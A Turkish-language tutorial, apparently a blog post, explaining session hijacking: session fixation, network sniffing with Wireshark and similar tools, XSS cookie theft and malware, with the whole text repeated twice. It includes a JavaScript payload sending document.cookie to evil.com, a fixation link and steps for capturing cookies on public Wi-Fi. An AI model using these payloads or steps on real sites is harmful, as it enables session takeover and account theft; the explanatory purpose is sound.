Session Hijacking Nedir?
Session hijacking, yani oturum gaspı, bir kullanıcının sunucuda aktif olan oturumunu ele geçirerek onun yetkileriyle işlem yapma saldırısıdır. Bu saldırı, kullanıcıyı taklit ederek sistemde her tür işlem yapmayı mümkün kılar. Kimlik doğrulama mekanizmasını doğrudan hedef almaz, ancak kimlik doğrulama sonrası oluşan oturumu hedef alır.
Temel Çalışma Mekanizması
1. Kullanıcı bir web uygulamasına giriş yapar.
2. Sunucu, kullanıcıyı tanımak için bir session ID oluşturur ve genellikle bu bilgiyi kullanıcıya bir çerez (cookie) ile gönderir.
3. Kullanıcı uygulamayı kullanmaya devam ettikçe, her istekte bu session ID sunucuya gönderilir.
4. Eğer saldırgan bu session ID’yi bir şekilde ele geçirirse, aynı session ID ile sunucuya istek göndererek oturumu alabilir.
Saldırı Türleri
1. Session Fixation
Saldırgan, kurban giriş yapmadan önce ona belirli bir session ID’yi "yedirmeye" çalışır. Kurban, bu ID üzerinden oturum açarsa, saldırgan aynı ID üzerinden oturuma erişim sağlayabilir.
Senaryo:
Saldırgan, bir link paylaşır:
Kurban bu link üzerinden giriş yapar ve belirlenen session ID’yi kullanmış olur.
2. Session Sidejacking (Ağ Dinleme)
Saldırgan, kullanıcı ile sunucu arasındaki HTTP trafiğini dinleyerek session ID’yi elde edebilir. Bu yöntem genellikle şifrelenmemiş (HTTP) bağlantılarında iş görür.
Araçlar:
Wireshark
tcpdump
Ettercap
mitmproxy
3. XSS (Cross-Site Scripting) ile Session Ele Geçirme
Eğer web uygulamasında XSS açığı varsa, saldırgan kötü niyetli bir JavaScript kodu çalıştırarak session ID’yi çalabilir.
Örnek Kod:
4. Malware / Keylogger
Kurbanın cihazına bulaştırılan zararlı yazılım ile tarayıcıdaki session bilgileri çalınabilir. Özellikle çerez (cookie) dosyaları hedef alınır.
Gerçekleştirme Aşamaları
Örneğin:
Aynı yerel ağda (örneğin halka açık Wi-Fi) iki kullanıcı var.
Kurban HTTP üzerinden bir siteye giriş yapıyor.
Saldırgan, Wireshark ile ağı dinliyor.
Adımlar:
1. Wireshark başlatılır.
2. Ağ arayüzü seçilir (örneğin wlan0).
3. Filtre uygulanır: http.cookie
4. Gözlemlenen session ID alınır.
5. Bu ID, tarayıcıda ilgili alanlara yerleştirilerek oturum ele geçirilir.
~code Ekibi
Session hijacking, yani oturum gaspı, bir kullanıcının sunucuda aktif olan oturumunu ele geçirerek onun yetkileriyle işlem yapma saldırısıdır. Bu saldırı, kullanıcıyı taklit ederek sistemde her tür işlem yapmayı mümkün kılar. Kimlik doğrulama mekanizmasını doğrudan hedef almaz, ancak kimlik doğrulama sonrası oluşan oturumu hedef alır.
Temel Çalışma Mekanizması
1. Kullanıcı bir web uygulamasına giriş yapar.
2. Sunucu, kullanıcıyı tanımak için bir session ID oluşturur ve genellikle bu bilgiyi kullanıcıya bir çerez (cookie) ile gönderir.
3. Kullanıcı uygulamayı kullanmaya devam ettikçe, her istekte bu session ID sunucuya gönderilir.
4. Eğer saldırgan bu session ID’yi bir şekilde ele geçirirse, aynı session ID ile sunucuya istek göndererek oturumu alabilir.
Saldırı Türleri
1. Session Fixation
Saldırgan, kurban giriş yapmadan önce ona belirli bir session ID’yi "yedirmeye" çalışır. Kurban, bu ID üzerinden oturum açarsa, saldırgan aynı ID üzerinden oturuma erişim sağlayabilir.
Senaryo:
Saldırgan, bir link paylaşır:
https://site.com?sessionID=ABC123Kurban bu link üzerinden giriş yapar ve belirlenen session ID’yi kullanmış olur.
2. Session Sidejacking (Ağ Dinleme)
Saldırgan, kullanıcı ile sunucu arasındaki HTTP trafiğini dinleyerek session ID’yi elde edebilir. Bu yöntem genellikle şifrelenmemiş (HTTP) bağlantılarında iş görür.
Araçlar:
Wireshark
tcpdump
Ettercap
mitmproxy
3. XSS (Cross-Site Scripting) ile Session Ele Geçirme
Eğer web uygulamasında XSS açığı varsa, saldırgan kötü niyetli bir JavaScript kodu çalıştırarak session ID’yi çalabilir.
Örnek Kod:
<script> fetch("https://evil.com/steal?cookie=" + document.cookie);</script>4. Malware / Keylogger
Kurbanın cihazına bulaştırılan zararlı yazılım ile tarayıcıdaki session bilgileri çalınabilir. Özellikle çerez (cookie) dosyaları hedef alınır.
Gerçekleştirme Aşamaları
Örneğin:
Aynı yerel ağda (örneğin halka açık Wi-Fi) iki kullanıcı var.
Kurban HTTP üzerinden bir siteye giriş yapıyor.
Saldırgan, Wireshark ile ağı dinliyor.
Adımlar:
1. Wireshark başlatılır.
2. Ağ arayüzü seçilir (örneğin wlan0).
3. Filtre uygulanır: http.cookie
4. Gözlemlenen session ID alınır.
5. Bu ID, tarayıcıda ilgili alanlara yerleştirilerek oturum ele geçirilir.
~code Ekibi
